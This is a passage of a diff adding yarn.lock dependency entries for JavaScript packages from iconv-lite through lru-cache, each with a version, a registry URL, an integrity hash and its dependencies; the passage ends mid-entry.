"https://registry.yarnpkg.com/iconv-lite/-/iconv-lite-0.4.23.tgz#297871f63be507adcfbfca715d0cd0eed84e9a63" + dependencies: + safer-buffer ">= 2.1.2 < 3" + +icss-replace-symbols@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/icss-replace-symbols/-/icss-replace-symbols-1.1.0.tgz#06ea6f83679a7749e386cfe1fe812ae5db223ded" + +icss-utils@^2.1.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/icss-utils/-/icss-utils-2.1.0.tgz#83f0a0ec378bf3246178b6c2ad9136f135b1c962" + dependencies: + postcss "^6.0.1" + +ieee754@^1.1.11, ieee754@^1.1.4: + version "1.1.12" + resolved "https://registry.yarnpkg.com/ieee754/-/ieee754-1.1.12.tgz#50bf24e5b9c8bb98af4964c941cdb0918da7b60b" + +iferr@^0.1.5: + version "0.1.5" + resolved "https://registry.yarnpkg.com/iferr/-/iferr-0.1.5.tgz#c60eed69e6d8fdb6b3104a1fcbca1c192dc5b501" + +ignore-walk@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/ignore-walk/-/ignore-walk-3.0.1.tgz#a83e62e7d272ac0e3b551aaa82831a19b69f82f8" + dependencies: + minimatch "^3.0.4" + +ignore@^3.3.5: + version "3.3.10" + resolved "https://registry.yarnpkg.com/ignore/-/ignore-3.3.10.tgz#0a97fb876986e8081c631160f8f9f389157f0043" + +immediate@^3.2.3: + version "3.2.3" + resolved "https://registry.yarnpkg.com/immediate/-/immediate-3.2.3.tgz#d140fa8f614659bd6541233097ddaac25cdd991c" + +import-lazy@^2.1.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/import-lazy/-/import-lazy-2.1.0.tgz#05698e3d45c88e8d7e9d92cb0584e77f096f3e43" + +import-local@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/import-local/-/import-local-1.0.0.tgz#5e4ffdc03f4fe6c009c6729beb29631c2f8227bc" + dependencies: + pkg-dir "^2.0.0" + resolve-cwd "^2.0.0" + +imurmurhash@^0.1.4: + version "0.1.4" + resolved "https://registry.yarnpkg.com/imurmurhash/-/imurmurhash-0.1.4.tgz#9218b9b2b928a238b13dc4fb6b6d576f231453ea" + +indent-string@^3.0.0: + version "3.2.0" + resolved "https://registry.yarnpkg.com/indent-string/-/indent-string-3.2.0.tgz#4a5fd6d27cc332f37e5419a504dbb837105c9289" + +indexes-of@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/indexes-of/-/indexes-of-1.0.1.tgz#f30f716c8e2bd346c7b67d3df3915566a7c05607" + +indexof@0.0.1: + version "0.0.1" + resolved "https://registry.yarnpkg.com/indexof/-/indexof-0.0.1.tgz#82dc336d232b9062179d05ab3293a66059fd435d" + +inflight@^1.0.4: + version "1.0.6" + resolved "https://registry.yarnpkg.com/inflight/-/inflight-1.0.6.tgz#49bd6331d7d02d0c09bc910a1075ba8165b56df9" + dependencies: + once "^1.3.0" + wrappy "1" + +inherits@2, inherits@2.0.3, inherits@^2.0.1, inherits@^2.0.3, inherits@~2.0.1, inherits@~2.0.3: + version "2.0.3" + resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.3.tgz#633c2c83e3da42a502f52466022480f4208261de" + +inherits@2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.1.tgz#b17d08d326b4423e568eff719f91b0b1cbdf69f1" + +ini@^1.3.4, ini@~1.3.0: + version "1.3.5" + resolved "https://registry.yarnpkg.com/ini/-/ini-1.3.5.tgz#eee25f56db1c9ec6085e0c22778083f596abf927" + +invariant@^2.2.0, invariant@^2.2.2: + version "2.2.4" + resolved "https://registry.yarnpkg.com/invariant/-/invariant-2.2.4.tgz#610f3c92c9359ce1db616e538008d23ff35158e6" + dependencies: + loose-envify "^1.0.0" + +is-absolute-url@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/is-absolute-url/-/is-absolute-url-2.1.0.tgz#50530dfb84fcc9aa7dbe7852e83a37b93b9f2aa6" + +is-accessor-descriptor@^0.1.6: + version "0.1.6" + resolved "https://registry.yarnpkg.com/is-accessor-descriptor/-/is-accessor-descriptor-0.1.6.tgz#a9e12cb3ae8d876727eeef3843f8a0897b5c98d6" + dependencies: + kind-of "^3.0.2" + +is-accessor-descriptor@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/is-accessor-descriptor/-/is-accessor-descriptor-1.0.0.tgz#169c2f6d3df1f992618072365c9b0ea1f6878656" + dependencies: + kind-of "^6.0.0" + +is-arrayish@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/is-arrayish/-/is-arrayish-0.2.1.tgz#77c99840527aa8ecb1a8ba697b80645a7a926a9d" + +is-binary-path@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/is-binary-path/-/is-binary-path-1.0.1.tgz#75f16642b480f187a711c814161fd3a4a7655898" + dependencies: + binary-extensions "^1.0.0" + +is-buffer@^1.1.5: + version "1.1.6" + resolved "https://registry.yarnpkg.com/is-buffer/-/is-buffer-1.1.6.tgz#efaa2ea9daa0d7ab2ea13a97b2b8ad51fefbe8be" + +is-builtin-module@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/is-builtin-module/-/is-builtin-module-1.0.0.tgz#540572d34f7ac3119f8f76c30cbc1b1e037affbe" + dependencies: + builtin-modules "^1.0.0" + +is-callable@^1.1.1, is-callable@^1.1.3: + version "1.1.3" + resolved "https://registry.yarnpkg.com/is-callable/-/is-callable-1.1.3.tgz#86eb75392805ddc33af71c92a0eedf74ee7604b2" + +is-ci@^1.0.10, is-ci@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/is-ci/-/is-ci-1.1.0.tgz#247e4162e7860cebbdaf30b774d6b0ac7dcfe7a5" + dependencies: + ci-info "^1.0.0" + +is-data-descriptor@^0.1.4: + version "0.1.4" + resolved "https://registry.yarnpkg.com/is-data-descriptor/-/is-data-descriptor-0.1.4.tgz#0b5ee648388e2c860282e793f1856fec3f301b56" + dependencies: + kind-of "^3.0.2" + +is-data-descriptor@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/is-data-descriptor/-/is-data-descriptor-1.0.0.tgz#d84876321d0e7add03990406abbbbd36ba9268c7" + dependencies: + kind-of "^6.0.0" + +is-date-object@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/is-date-object/-/is-date-object-1.0.1.tgz#9aa20eb6aeebbff77fbd33e74ca01b33581d3a16" + +is-descriptor@^0.1.0: + version "0.1.6" + resolved "https://registry.yarnpkg.com/is-descriptor/-/is-descriptor-0.1.6.tgz#366d8240dde487ca51823b1ab9f07a10a78251ca" + dependencies: + is-accessor-descriptor "^0.1.6" + is-data-descriptor "^0.1.4" + kind-of "^5.0.0" + +is-descriptor@^1.0.0, is-descriptor@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/is-descriptor/-/is-descriptor-1.0.2.tgz#3b159746a66604b04f8c81524ba365c5f14d86ec" + dependencies: + is-accessor-descriptor "^1.0.0" + is-data-descriptor "^1.0.0" + kind-of "^6.0.2" + +is-directory@^0.3.1: + version "0.3.1" + resolved "https://registry.yarnpkg.com/is-directory/-/is-directory-0.3.1.tgz#61339b6f2475fc772fd9c9d83f5c8575dc154ae1" + +is-dotfile@^1.0.0: + version "1.0.3" + resolved "https://registry.yarnpkg.com/is-dotfile/-/is-dotfile-1.0.3.tgz#a6a2f32ffd2dfb04f5ca25ecd0f6b83cf798a1e1" + +is-equal-shallow@^0.1.3: + version "0.1.3" + resolved "https://registry.yarnpkg.com/is-equal-shallow/-/is-equal-shallow-0.1.3.tgz#2238098fc221de0bcfa5d9eac4c45d638aa1c534" + dependencies: + is-primitive "^2.0.0" + +is-extendable@^0.1.0, is-extendable@^0.1.1: + version "0.1.1" + resolved "https://registry.yarnpkg.com/is-extendable/-/is-extendable-0.1.1.tgz#62b110e289a471418e3ec36a617d472e301dfc89" + +is-extendable@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/is-extendable/-/is-extendable-1.0.1.tgz#a7470f9e426733d81bd81e1155264e3a3507cab4" + dependencies: + is-plain-object "^2.0.4" + +is-extglob@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/is-extglob/-/is-extglob-1.0.0.tgz#ac468177c4943405a092fc8f29760c6ffc6206c0" + +is-extglob@^2.1.0, is-extglob@^2.1.1: + version "2.1.1" + resolved "https://registry.yarnpkg.com/is-extglob/-/is-extglob-2.1.1.tgz#a88c02535791f02ed37c76a1b9ea9773c833f8c2" + +is-fullwidth-code-point@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/is-fullwidth-code-point/-/is-fullwidth-code-point-1.0.0.tgz#ef9e31386f031a7f0d643af82fde50c457ef00cb" + dependencies: + number-is-nan "^1.0.0" + +is-fullwidth-code-point@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/is-fullwidth-code-point/-/is-fullwidth-code-point-2.0.0.tgz#a3b30a5c4f199183167aaab93beefae3ddfb654f" + +is-generator-function@^1.0.3: + version "1.0.7" + resolved "https://registry.yarnpkg.com/is-generator-function/-/is-generator-function-1.0.7.tgz#d2132e529bb0000a7f80794d4bdf5cd5e5813522" + +is-glob@^2.0.0, is-glob@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/is-glob/-/is-glob-2.0.1.tgz#d096f926a3ded5600f3fdfd91198cb0888c2d863" + dependencies: + is-extglob "^1.0.0" + +is-glob@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/is-glob/-/is-glob-3.1.0.tgz#7ba5ae24217804ac70707b96922567486cc3e84a" + dependencies: + is-extglob "^2.1.0" + +is-glob@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/is-glob/-/is-glob-4.0.0.tgz#9521c76845cc2610a85203ddf080a958c2ffabc0" + dependencies: + is-extglob "^2.1.1" + +is-installed-globally@^0.1.0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/is-installed-globally/-/is-installed-globally-0.1.0.tgz#0dfd98f5a9111716dd535dda6492f67bf3d25a80" + dependencies: + global-dirs "^0.1.0" + is-path-inside "^1.0.0" + +is-npm@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/is-npm/-/is-npm-1.0.0.tgz#f2fb63a65e4905b406c86072765a1a4dc793b9f4" + +is-number@^2.1.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/is-number/-/is-number-2.1.0.tgz#01fcbbb393463a548f2f466cce16dece49db908f" + dependencies: + kind-of "^3.0.2" + +is-number@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/is-number/-/is-number-3.0.0.tgz#24fd6201a4782cf50561c810276afc7d12d71195" + dependencies: + kind-of "^3.0.2" + +is-number@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/is-number/-/is-number-4.0.0.tgz#0026e37f5454d73e356dfe6564699867c6a7f0ff" + +is-number@^5.0.0: + version "5.0.0" + resolved "https://registry.yarnpkg.com/is-number/-/is-number-5.0.0.tgz#c393bc471e65de1a10a6abcb20efeb12d2b88166" + +is-obj@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/is-obj/-/is-obj-1.0.1.tgz#3e4729ac1f5fde025cd7d83a896dab9f4f67db0f" + +is-odd@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/is-odd/-/is-odd-2.0.0.tgz#7646624671fd7ea558ccd9a2795182f2958f1b24" + dependencies: + is-number "^4.0.0" + +is-path-inside@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/is-path-inside/-/is-path-inside-1.0.1.tgz#8ef5b7de50437a3fdca6b4e865ef7aa55cb48036" + dependencies: + path-is-inside "^1.0.1" + +is-plain-obj@^1.0.0, is-plain-obj@^1.1, is-plain-obj@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/is-plain-obj/-/is-plain-obj-1.1.0.tgz#71a50c8429dfca773c92a390a4a03b39fcd51d3e" + +is-plain-object@^2.0.1, is-plain-object@^2.0.3, is-plain-object@^2.0.4: + version "2.0.4" + resolved "https://registry.yarnpkg.com/is-plain-object/-/is-plain-object-2.0.4.tgz#2c163b3fafb1b606d9d17928f05c2a1c38e07677" + dependencies: + isobject "^3.0.1" + +is-posix-bracket@^0.1.0: + version "0.1.1" + resolved "https://registry.yarnpkg.com/is-posix-bracket/-/is-posix-bracket-0.1.1.tgz#3334dc79774368e92f016e6fbc0a88f5cd6e6bc4" + +is-primitive@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/is-primitive/-/is-primitive-2.0.0.tgz#207bab91638499c07b2adf240a41a87210034575" + +is-redirect@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/is-redirect/-/is-redirect-1.0.0.tgz#1d03dded53bd8db0f30c26e4f95d36fc7c87dc24" + +is-regex@^1.0.4: + version "1.0.4" + resolved "https://registry.yarnpkg.com/is-regex/-/is-regex-1.0.4.tgz#5517489b547091b0930e095654ced25ee97e9491" + dependencies: + has "^1.0.1" + +is-retry-allowed@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/is-retry-allowed/-/is-retry-allowed-1.1.0.tgz#11a060568b67339444033d0125a61a20d564fb34" + +is-stream@^1.0.0, is-stream@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/is-stream/-/is-stream-1.1.0.tgz#12d4a3dd4e68e0b79ceb8dbc84173ae80d91ca44" + +is-svg@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/is-svg/-/is-svg-2.1.0.tgz#cf61090da0d9efbcab8722deba6f032208dbb0e9" + dependencies: + html-comment-regex "^1.1.0" + +is-symbol@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/is-symbol/-/is-symbol-1.0.1.tgz#3cc59f00025194b6ab2e38dbae6689256b660572" + +is-windows@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/is-windows/-/is-windows-1.0.2.tgz#d1850eb9791ecd18e6182ce12a30f396634bb19d" + +is-wsl@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/is-wsl/-/is-wsl-1.1.0.tgz#1f16e4aa22b04d1336b66188a66af3c600c3a66d" + +isarray@0.0.1: + version "0.0.1" + resolved "https://registry.yarnpkg.com/isarray/-/isarray-0.0.1.tgz#8a18acfca9a8f4177e09abfc6038939b05d1eedf" + +isarray@1.0.0, isarray@^1.0.0, isarray@~1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/isarray/-/isarray-1.0.0.tgz#bb935d48582cba168c06834957a54a3e07124f11" + +isarray@^2.0.1: + version "2.0.4" + resolved "https://registry.yarnpkg.com/isarray/-/isarray-2.0.4.tgz#38e7bcbb0f3ba1b7933c86ba1894ddfc3781bbb7" + +isemail@3.x.x: + version "3.1.2" + resolved "https://registry.yarnpkg.com/isemail/-/isemail-3.1.2.tgz#937cf919002077999a73ea8b1951d590e84e01dd" + dependencies: + punycode "2.x.x" + +isexe@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/isexe/-/isexe-2.0.0.tgz#e8fbf374dc556ff8947a10dcb0572d633f2cfa10" + +isobject@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/isobject/-/isobject-2.1.0.tgz#f065561096a3f1da2ef46272f815c840d87e0c89" + dependencies: + isarray "1.0.0" + +isobject@^3.0.0, isobject@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/isobject/-/isobject-3.0.1.tgz#4e431e92b11a9731636aa1f9c8d1ccbcfdab78df" + +javascript-stringify@^1.6.0: + version "1.6.0" + resolved "https://registry.yarnpkg.com/javascript-stringify/-/javascript-stringify-1.6.0.tgz#142d111f3a6e3dae8f4a9afd77d45855b5a9cce3" + +joi@^11.1.1: + version "11.4.0" + resolved "https://registry.yarnpkg.com/joi/-/joi-11.4.0.tgz#f674897537b625e9ac3d0b7e1604c828ad913ccb" + dependencies: + hoek "4.x.x" + isemail "3.x.x" + topo "2.x.x" + +js-base64@^2.1.9: + version "2.4.5" + resolved "https://registry.yarnpkg.com/js-base64/-/js-base64-2.4.5.tgz#e293cd3c7c82f070d700fc7a1ca0a2e69f101f92" + +js-tokens@^3.0.0, js-tokens@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/js-tokens/-/js-tokens-3.0.2.tgz#9866df395102130e38f7f996bceb65443209c25b" + +js-yaml@^3.11.0, js-yaml@^3.4.3, js-yaml@^3.9.0: + version "3.12.0" + resolved "https://registry.yarnpkg.com/js-yaml/-/js-yaml-3.12.0.tgz#eaed656ec8344f10f527c6bfa1b6e2244de167d1" + dependencies: + argparse "^1.0.7" + esprima "^4.0.0" + +js-yaml@~3.7.0: + version "3.7.0" + resolved "https://registry.yarnpkg.com/js-yaml/-/js-yaml-3.7.0.tgz#5c967ddd837a9bfdca5f2de84253abe8a1c03b80" + dependencies: + argparse "^1.0.7" + esprima "^2.6.0" + +jsesc@^2.5.1: + version "2.5.1" + resolved "https://registry.yarnpkg.com/jsesc/-/jsesc-2.5.1.tgz#e421a2a8e20d6b0819df28908f782526b96dd1fe" + +jsesc@~0.5.0: + version "0.5.0" + resolved "https://registry.yarnpkg.com/jsesc/-/jsesc-0.5.0.tgz#e7dee66e35d6fc16f710fe91d5cf69f70f08911d" + +json-parse-better-errors@^1.0.1, json-parse-better-errors@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/json-parse-better-errors/-/json-parse-better-errors-1.0.2.tgz#bb867cfb3450e69107c131d1c514bab3dc8bcaa9" + +json-schema-traverse@^0.4.1: + version "0.4.1" + resolved "https://registry.yarnpkg.com/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz#69f6a87d9513ab8bb8fe63bdb0979c448e684660" + +json-stringify-safe@^5.0.1: + version "5.0.1" + resolved "https://registry.yarnpkg.com/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz#1296a2d58fd45f19a0f6ce01d65701e2c735b6eb" + +json5@^0.5.0: + version "0.5.1" + resolved "https://registry.yarnpkg.com/json5/-/json5-0.5.1.tgz#1eade7acc012034ad84e2396767ead9fa5495821" + +jsonfile@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/jsonfile/-/jsonfile-4.0.0.tgz#8771aae0799b64076b76640fca058f9c10e33ecb" + optionalDependencies: + graceful-fs "^4.1.6" + +keygrip@~1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/keygrip/-/keygrip-1.0.2.tgz#ad3297c557069dea8bcfe7a4fa491b75c5ddeb91" + +killable@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/killable/-/killable-1.0.0.tgz#da8b84bd47de5395878f95d64d02f2449fe05e6b" + +kind-of@^3.0.2, kind-of@^3.0.3, kind-of@^3.2.0: + version "3.2.2" + resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-3.2.2.tgz#31ea21a734bab9bbb0f32466d893aea51e4a3c64" + dependencies: + is-buffer "^1.1.5" + +kind-of@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-4.0.0.tgz#20813df3d712928b207378691a45066fae72dd57" + dependencies: + is-buffer "^1.1.5" + +kind-of@^5.0.0: + version "5.1.0" + resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-5.1.0.tgz#729c91e2d857b7a419a1f9aa65685c4c33f5845d" + +kind-of@^6.0.0, kind-of@^6.0.2: + version "6.0.2" + resolved "https://registry.yarnpkg.com/kind-of/-/kind-of-6.0.2.tgz#01146b36a6218e64e58f3a8d66de5d7fc6f6d051" + +koa-compose@^3.0.0, koa-compose@^3.2.1: + version "3.2.1" + resolved "https://registry.yarnpkg.com/koa-compose/-/koa-compose-3.2.1.tgz#a85ccb40b7d986d8e5a345b3a1ace8eabcf54de7" + dependencies: + any-promise "^1.1.0" + +koa-compose@^4.0.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/koa-compose/-/koa-compose-4.1.0.tgz#507306b9371901db41121c812e923d0d67d3e877" + +koa-connect@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/koa-connect/-/koa-connect-2.0.1.tgz#2acad159c33862de1d73aa4562a48de13f137c0f" + +koa-convert@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/koa-convert/-/koa-convert-1.2.0.tgz#da40875df49de0539098d1700b50820cebcd21d0" + dependencies: + co "^4.6.0" + koa-compose "^3.0.0" + +koa-is-json@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/koa-is-json/-/koa-is-json-1.0.0.tgz#273c07edcdcb8df6a2c1ab7d59ee76491451ec14" + +koa-mount@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/koa-mount/-/koa-mount-3.0.0.tgz#08cab3b83d31442ed8b7e75c54b1abeb922ec197" + dependencies: + debug "^2.6.1" + koa-compose "^3.2.1" + +koa-range@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/koa-range/-/koa-range-0.3.0.tgz#3588e3496473a839a1bd264d2a42b1d85bd7feac" + dependencies: + stream-slice "^0.1.2" + +koa-send@^4.1.3: + version "4.1.3" + resolved "https://registry.yarnpkg.com/koa-send/-/koa-send-4.1.3.tgz#0822207bbf5253a414c8f1765ebc29fa41353cb6" + dependencies: + debug "^2.6.3" + http-errors "^1.6.1" + mz "^2.6.0" + resolve-path "^1.4.0" + +koa-static@^4.0.2: + version "4.0.3" + resolved "https://registry.yarnpkg.com/koa-static/-/koa-static-4.0.3.tgz#5f93ad00fb1905db9ce46667c0e8bb7d22abfcd8" + dependencies: + debug "^3.1.0" + koa-send "^4.1.3" + +koa-webpack@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/koa-webpack/-/koa-webpack-4.0.0.tgz#1d9b83c109db106d8ef65db376f910a45ba964c7" + dependencies: + app-root-path "^2.0.1" + merge-options "^1.0.0" + webpack-dev-middleware "^3.0.0" + webpack-hot-client "^3.0.0" + webpack-log "^1.1.1" + +koa@^2.4.1: + version "2.5.1" + resolved "https://registry.yarnpkg.com/koa/-/koa-2.5.1.tgz#79f8b95f8d72d04fe9a58a8da5ebd6d341103f9c" + dependencies: + accepts "^1.2.2" + content-disposition "~0.5.0" + content-type "^1.0.0" + cookies "~0.7.0" + debug "*" + delegates "^1.0.0" + depd "^1.1.0" + destroy "^1.0.3" + error-inject "~1.0.0" + escape-html "~1.0.1" + fresh "^0.5.2" + http-assert "^1.1.0" + http-errors "^1.2.8" + is-generator-function "^1.0.3" + koa-compose "^4.0.0" + koa-convert "^1.2.0" + koa-is-json "^1.0.0" + mime-types "^2.0.7" + on-finished "^2.1.0" + only "0.0.2" + parseurl "^1.3.0" + statuses "^1.2.0" + type-is "^1.5.5" + vary "^1.0.0" + +last-call-webpack-plugin@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/last-call-webpack-plugin/-/last-call-webpack-plugin-3.0.0.tgz#9742df0e10e3cf46e5c0381c2de90d3a7a2d7555" + dependencies: + lodash "^4.17.5" + webpack-sources "^1.1.0" + +latest-version@^3.0.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/latest-version/-/latest-version-3.1.0.tgz#a205383fea322b33b5ae3b18abee0dc2f356ee15" + dependencies: + package-json "^4.0.0" + +leb@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/leb/-/leb-0.3.0.tgz#32bee9fad168328d6aea8522d833f4180eed1da3" + +linkify-it@^2.0.0: + version "2.0.3" + resolved "https://registry.yarnpkg.com/linkify-it/-/linkify-it-2.0.3.tgz#d94a4648f9b1c179d64fa97291268bdb6ce9434f" + dependencies: + uc.micro "^1.0.1" + +load-json-file@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/load-json-file/-/load-json-file-4.0.0.tgz#2f5f45ab91e33216234fd53adab668eb4ec0993b" + dependencies: + graceful-fs "^4.1.2" + parse-json "^4.0.0" + pify "^3.0.0" + strip-bom "^3.0.0" + +load-script@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/load-script/-/load-script-1.0.0.tgz#0491939e0bee5643ee494a7e3da3d2bac70c6ca4" + +loader-runner@^2.3.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/loader-runner/-/loader-runner-2.3.0.tgz#f482aea82d543e07921700d5a46ef26fdac6b8a2" + +loader-utils@^0.2.16: + version "0.2.17" + resolved "https://registry.yarnpkg.com/loader-utils/-/loader-utils-0.2.17.tgz#f86e6374d43205a6e6c60e9196f17c0299bfb348" + dependencies: + big.js "^3.1.3" + emojis-list "^2.0.0" + json5 "^0.5.0" + object-assign "^4.0.1" + +loader-utils@^1.0.2, loader-utils@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/loader-utils/-/loader-utils-1.1.0.tgz#c98aef488bcceda2ffb5e2de646d6a754429f5cd" + dependencies: + big.js "^3.1.3" + emojis-list "^2.0.0" + json5 "^0.5.0" + +locate-path@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/locate-path/-/locate-path-2.0.0.tgz#2b568b265eec944c6d9c0de9c3dbbbca0354cd8e" + dependencies: + p-locate "^2.0.0" + path-exists "^3.0.0" + +lodash._reinterpolate@~3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/lodash._reinterpolate/-/lodash._reinterpolate-3.0.0.tgz#0ccf2d89166af03b3663c796538b75ac6e114d9d" + +lodash.assign@~4.2.0: + version "4.2.0" + resolved "https://registry.yarnpkg.com/lodash.assign/-/lodash.assign-4.2.0.tgz#0d99f3ccd7a6d261d19bdaeb9245005d285808e7" + +lodash.camelcase@^4.3.0: + version "4.3.0" + resolved "https://registry.yarnpkg.com/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz#b28aa6288a2b9fc651035c7711f65ab6190331a6" + +lodash.clonedeep@^4.5.0: + version "4.5.0" + resolved "https://registry.yarnpkg.com/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz#e23f3f9c4f8fbdde872529c1071857a086e5ccef" + +lodash.debounce@^4.0.8: + version "4.0.8" + resolved "https://registry.yarnpkg.com/lodash.debounce/-/lodash.debounce-4.0.8.tgz#82d79bff30a67c4005ffd5e2515300ad9ca4d7af" + +lodash.memoize@^4.1.2: + version "4.1.2" + resolved "https://registry.yarnpkg.com/lodash.memoize/-/lodash.memoize-4.1.2.tgz#bcc6c49a42a2840ed997f323eada5ecd182e0bfe" + +lodash.template@^4.4.0: + version "4.4.0" + resolved "https://registry.yarnpkg.com/lodash.template/-/lodash.template-4.4.0.tgz#e73a0385c8355591746e020b99679c690e68fba0" + dependencies: + lodash._reinterpolate "~3.0.0" + lodash.templatesettings "^4.0.0" + +lodash.templatesettings@^4.0.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/lodash.templatesettings/-/lodash.templatesettings-4.1.0.tgz#2b4d4e95ba440d915ff08bc899e4553666713316" + dependencies: + lodash._reinterpolate "~3.0.0" + +lodash.throttle@^4.1.1: + version "4.1.1" + resolved "https://registry.yarnpkg.com/lodash.throttle/-/lodash.throttle-4.1.1.tgz#c23e91b710242ac70c37f1e1cda9274cc39bf2f4" + +lodash.uniq@^4.5.0: + version "4.5.0" + resolved "https://registry.yarnpkg.com/lodash.uniq/-/lodash.uniq-4.5.0.tgz#d0225373aeb652adc1bc82e4945339a842754773" + +lodash@^4.17.3, lodash@^4.17.4, lodash@^4.17.5: + version "4.17.10" + resolved "https://registry.yarnpkg.com/lodash/-/lodash-4.17.10.tgz#1b7793cf7259ea38fb3661d4d38b3260af8ae4e7" + +log-symbols@^2.1.0: + version "2.2.0" + resolved "https://registry.yarnpkg.com/log-symbols/-/log-symbols-2.2.0.tgz#5740e1c5d6f0dfda4ad9323b5332107ef6b4c40a" + dependencies: + chalk "^2.0.1" + +log-update@^2.3.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/log-update/-/log-update-2.3.0.tgz#88328fd7d1ce7938b29283746f0b1bc126b24708" + dependencies: + ansi-escapes "^3.0.0" + cli-cursor "^2.0.0" + wrap-ansi "^3.0.1" + +loglevelnext@^1.0.1, loglevelnext@^1.0.2: + version "1.0.5" + resolved "https://registry.yarnpkg.com/loglevelnext/-/loglevelnext-1.0.5.tgz#36fc4f5996d6640f539ff203ba819641680d75a2" + dependencies: + es6-symbol "^3.1.1" + object.assign "^4.1.0" + +long@^3.2.0: + version "3.2.0" + resolved "https://registry.yarnpkg.com/long/-/long-3.2.0.tgz#d821b7138ca1cb581c172990ef14db200b5c474b" + +loose-envify@^1.0.0: + version "1.3.1" + resolved "https://registry.yarnpkg.com/loose-envify/-/loose-envify-1.3.1.tgz#d1a8ad33fa9ce0e713d65fdd0ac8b748d478c848" + dependencies: + js-tokens "^3.0.0" + +loud-rejection@^1.0.0, loud-rejection@^1.6.0: + version "1.6.0" + resolved "https://registry.yarnpkg.com/loud-rejection/-/loud-rejection-1.6.0.tgz#5b46f80147edee578870f086d04821cf998e551f" + dependencies: + currently-unhandled "^0.4.1" + signal-exit "^3.0.0" + +lower-case@^1.1.1: + version "1.1.4" + resolved "https://registry.yarnpkg.com/lower-case/-/lower-case-1.1.4.tgz#9a2cabd1b9e8e0ae993a4bf7d5875c39c42e8eac" + +lowercase-keys@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/lowercase-keys/-/lowercase-keys-1.0.1.tgz#6f9e30b47084d971a7c820ff15a6c5167b74c26f" + +lru-cache@^4.0.1, lru-cache@^4.1.1, lru-cache@^4.1.2: + version "4.1.3" + resolved 